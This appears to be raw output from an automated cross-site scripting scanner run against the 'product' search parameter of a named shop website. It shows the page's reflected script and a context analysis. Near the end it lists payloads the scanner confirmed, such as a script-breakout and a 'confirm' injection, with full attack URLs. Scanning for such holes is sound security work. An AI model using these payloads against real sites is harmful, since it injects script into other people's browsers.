https://www.pullcast.eu

GET Params:[1]
['product']
_______________________________________________________________________________________________________
https://www.pullcast.eu/search?product=/uvw"xyz'yxz<zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script>
  $(document).ready(function() {
    if($(window).width() > 767){
      $('.filterOptions').attr("data-offset-top", $('.second_header_segment').height() + $('.thirs_header_segment').height() +28 + $('.all-products-border').height());
    }else{
      $('.filterOptions').attr("data-offset-top", $('.navbar-inverse').height() + $('.col-large-8').height() * 4 - 100);
      $('.filterOptions.affix').css('top', $('.navbar-inverse').height() + 20);
      $('.dropdown.teste').click(function(){
          $(this).children('.dropdown-menu').stop(true,true).slideDown(200);
          $(this).addClass("open");
          $(this).addClass("opennodrop");
      });
    }

    // $('.filterOptions').css({'width':$('.container').width(), 'top':$('.navbar-inverse').height() + 31});
      // $( window ).resize(function() {
      //   $('.filterOptions').css({'width':$('.container').width(), 'top':$('.navbar-inverse').height() + 42});
      // });
    $('.nav-wrapper').css('min-height', $('.navbar-inverse').height() + 40);
    $('.navbar-inverse').css('background-color', 'black');
    if ($(window).width() > 1200) {
       $('.removeclassopen').click(function () {
           $('.dropdown-menu').slideUp(200);
       });

       $('.dropdown.teste').hover(
               function () {
                   $(this).children('.dropdown-menu').stop(true,true).slideDown(200);
                   $(this).addClass("open");
                   $(this).addClass("opennodrop");
               },
               function () {
                   $(this).children('.dropdown-menu').stop(true,true).slideUp(0);
                   $(this).removeClass("open");
                   $(this).removeClass("opennodrop");

               }
       );

       $('.dropdown-menu').click(function () {

           $(this).parent().addClass("opennodrop");

       });

       //MOSTRAR ESTILO DE BORDER BOTTOM NO HOVER NOS BOTÕES QUE NÃO TÊM DROPDOWN NO MENU

   }

   if ($(window).width() < 1200) {

       $('#menucollapsed .dropdown-toggle').removeClass("disabled");
   }
   if ($(window).width() > 992) {
     var bestsellersHeight = $('.best-sellers-height')[0].getBoundingClientRect().height;
     var bestsellersHeight2 = $('.best-sellers-height .col-xs-6')[0].getBoundingClientRect().height;
     $('.ambiance-best-sellers-height').css('height',parseFloat(bestsellersHeight2.toFixed(2)) + parseFloat(bestsellersHeight2.toFixed(2)) + 9.9);
     $('.ambiance-best-sellers-height-2').css('height',parseFloat(bestsellersHeight2.toFixed(2)) - 0.1);
   }else{
     var bestsellersHeight = $('.best-sellers-height .col-xs-6')[0].getBoundingClientRect().height;
     $('.ambiance-best-sellers-height').css('height',bestsellersHeight);
     $('.ambiance-best-sellers-height-2').css('height',bestsellersHeight);
   }

   
                 grid = $('.grid').isotope({
                 itemSelector: '.grid-item-test',
                 percentPosition: true,
                 masonry: {
                   columnWidth: '.grid-sizer'
                 },
                 filter:'./uvw"xyz'yxz<zxy'});
                 
                 var iso = grid.data('isotope');
                 console.log(iso.filteredItems.length);
                 if(iso.filteredItems.length == 0){
                   $('.filter-text').removeClass('hidden').text('No Results to show try other keyword').css('text-transform','uppercase');
                 }else{
                   $('.filter-text').removeClass('hidden').text('/UVW"XYZ'YXZ<ZXY').css('text-transform','uppercase');
                 }
                  $('.best-sellers-top').addClass('hidden');
                 $('.best-sellers-bottom').removeClass('hidden');
                 $('.filter-collection').addClass('hidden');

                 $('.filter-all-test').removeClass('hidden');
                 $('.clear-filter').removeClass('hidden');
                
   $('.all-products-products').hover(function () {
          $('.reveal', this).stop(true, true).slideDown("normal");
      }, function () {
          $('.reveal', this).stop(true, true).slideUp("normal");
      });

      $('.grid').isotope({
      itemSelector: '.grid-item-test',
      percentPosition: true,
      masonry: {
        columnWidth: '.grid-sizer'
      }
    });

    $('.filter-button-group').on('click', function() {
      $('.filter-all-test').removeClass('hidden');
      $('.clear-filter').removeClass('hidden');
      console.log($(this).attr('data-filter'));
       var filterValue = $(this).attr('data-filter');
         $('.best-sellers-top').addClass('hidden');
         $('.best-sellers-bottom').removeClass('hidden');
       //  $('.title-main').show();
       // $('.title-main').not($(filterValue + '-title')).not('.best-sellers-title').hide();
       $('.filter-collection').addClass('hidden');
       $('.filter-text').removeClass('hidden').text(filterValue.replace(/\-/g, " ").replace(/\./g, "")).css('text-transform','uppercase');
       $("html, body").animate({
         scrollTop: $('.filter-scroll').offset().top - 120
       }, 500);
       $('.grid').isotope({
         filter: filterValue,
         itemSelector: '.grid-item-test',
         percentPosition: true,
         masonry: {
           columnWidth: '.grid-sizer'
         }
       });

     });
     $('.clear-filter').click(function(){
       $('.filter-all-test').addClass('hidden');
       $('.clear-filter').addClass('hidden');
       $('.filter-collection').removeClass('hidden');
       $('.filter-text').addClass('hidden');
       $("html, body").animate({
         scrollTop: $('.filter-scroll').offset().top - 120
       }, 500);
       $('.grid').isotope({
         itemSelector: '.grid-item-test',
         percentPosition: true,
         masonry: {
           columnWidth: '.grid-sizer'
         },
         filter: '*'
     });
   });

   $('.get-price-modal-click').click(function(){
     var product = $(this).attr('data-product');
     console.log(product);
     $('#get-price-all-products h3').html('GET PRICE OF ' + product);
     $('#get-price-all-products #subject').val('GET PRICE OF ' + product);
     $('#get-price-all-products #productname').val(product);
   });
  });
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Script-Single : 	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: https://www.pullcast.eu/search?product='; confirm`1`; '

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 

SCRIPT Attack Url: https://www.pullcast.eu/search?product=</script><script>alert`1`</script>

=>Detection  Successful with Payload: </script><script>alert`1`</script>

FINAL OUTPUT: 
